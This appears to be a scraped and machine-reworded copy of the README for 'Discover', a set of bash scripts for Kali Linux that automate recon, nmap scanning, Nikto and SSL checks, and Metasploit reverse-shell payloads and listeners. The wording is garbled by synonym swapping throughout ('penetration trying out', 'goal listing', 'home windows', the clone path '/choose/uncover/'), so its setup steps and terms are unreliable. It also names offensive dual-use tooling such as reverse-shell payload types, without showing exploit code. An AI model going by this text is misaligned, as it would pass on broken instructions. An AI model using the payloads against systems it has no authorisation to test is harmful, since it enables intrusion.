Custom bash scripts used to automate quite a lot of penetration trying out duties together with recon, scanning, parsing, and growing malicious payloads and listeners with Metasploit. For use with Kali Linux and the Penetration Testers Framework (PTF).
- Lee Baird @discoverscripts
- Jay “L1ghtn1ng” Townsend @jay_townsend1
- Jason Ashton @ninewires
Download, setup, and utilization
- git clone https://github.com/leebaird/uncover /choose/uncover/
- All scripts should be ran from this location.
- cd /choose/uncover/
- ./replace.sh
RECON
1. Domain
2. Person
3. Parse salesforce
SCANNING
4. Generate goal listing
5. CIDR
6. List
7. IP, vary, or area
8. Rerun Nmap scripts and MSF aux
WEB
9. Insecure direct object reference
10. Open more than one tabs in Firefox
11. Nikto
12. SSL
MISC
13. Parse XML
14. Generate a malicious payload
15. Start a Metasploit listener
16. Update
17. ExitRECON
Domain
RECON
1. Passive
2. Active
3. Import names into an current recon-ng workspace
4. Previous menuPassive makes use of ARIN, dnsrecon, goofile, goog-mail, goohost, theHarvester, Metasploit, URLCrazy, Whois, more than one web pages, and recon-ng.
Active makes use of dnsrecon, WAF00W, traceroute, Whatweb, and recon-ng.
[*] Acquire API keys for Bing, Builtwith, Fullcontact, GitHub, Google, Hashes, Hunter, SecurityTrails, and Shodan for most effects with recon-ng and theHarvester.
API key places:
recon-ng
display keys
keys upload bing_api
theHarvester
/choose/theHarvester/api-keys.yamlPerson
RECON
First identify:
Last identify:- Combines data from more than one web pages.
Parse salesforce
Create a unfastened account at salesforce (https://attach.information.com/login).
Perform a seek for your goal corporate > make a selection the corporate identify > see all.
Copy the consequences into a brand new document.
Enter the positioning of your listing:- Gather names and positions right into a blank listing.
SCANNING
Generate goal listing
SCANNING
1. Local space community
2. NetBIOS
3. netdiscover
4. Ping sweep
5. Previous menu- Use other gear to create a goal listing together with Angry IP Scanner, arp-scan, netdiscover and nmap pingsweep.
CIDR, List, IP, Range, or URL
Type of scan:
1. External
2. Internal
3. Previous menu- External scan will set the nmap supply port to 53 and the max-rrt-timeout to 1500ms.
- Internal scan will set the nmap supply port to 88 and the max-rrt-timeout to 500ms.
- Nmap is used to accomplish host discovery, port scanning, carrier enumeration and OS id.
- Matching nmap scripts are used for added enumeration.
- Addition gear: enum4linux, smbclient, and ike-scan.
- Matching Metasploit auxiliary modules also are leveraged.
WEB
Insecure direct object reference
Using Burp, authenticate to a web page, map & Spider, then log off.
Target > Site map > make a selection the URL > proper click on > Copy URLs on this host.
Paste the consequences into a brand new document.
Enter the positioning of your document:Open more than one tabs in Firefox
Open more than one tabs in Firefox with:
1. List
2. Directories from robots.txt.
3. Previous menu- Use an inventory containing IPs and/or URLs.
- Use wget to tug a website’s robotic.txt document, then open the entire directories.
Nikto
Run more than one cases of Nikto in parallel.
1. List of IPs.
2. List of IP:port.
3. Previous menuSSL
Check for SSL certificates problems.
Enter the positioning of your listing:- Use sslscan and sslyze to test for SSL/TLS certificates problems.
MISC
Parse XML
Parse XML to CSV.
1. Burp (Base64)
2. Nessus (.nessus)
3. Nexpose (XML 2.0)
4. Nmap
5. Qualys
6. Previous menuGenerate a malicious payload
Malicious Payloads
1. android/meterpreter/reverse_tcp
2. cmd/home windows/reverse_powershell
3. java/jsp_shell_reverse_tcp (Linux)
4. java/jsp_shell_reverse_tcp (Windows)
5. linux/x64/meterpreter_reverse_https
6. linux/x64/meterpreter_reverse_tcp
7. linux/x64/shell/reverse_tcp
8. osx/x64/meterpreter_reverse_https
9. osx/x64/meterpreter_reverse_tcp
10. php/meterpreter/reverse_tcp
11. python/meterpreter_reverse_https
12. python/meterpreter_reverse_tcp
13. home windows/x64/meterpreter_reverse_https
14. home windows/x64/meterpreter_reverse_tcp
15. Previous menuStart a Metasploit listener
Metasploit Listeners
1. android/meterpreter/reverse_tcp
2. cmd/home windows/reverse_powershell
3. java/jsp_shell_reverse_tcp
4. linux/x64/meterpreter_reverse_https
5. linux/x64/meterpreter_reverse_tcp
6. linux/x64/shell/reverse_tcp
7. osx/x64/meterpreter_reverse_https
8. osx/x64/meterpreter_reverse_tcp
9. php/meterpreter/reverse_tcp
10. python/meterpreter_reverse_https
11. python/meterpreter_reverse_tcp
12. home windows/x64/meterpreter_reverse_https
13. home windows/x64/meterpreter_reverse_tcp
14. Previous menuUpdate
- Use to replace Kali Linux , Discover scripts, quite a lot of gear, and the find database.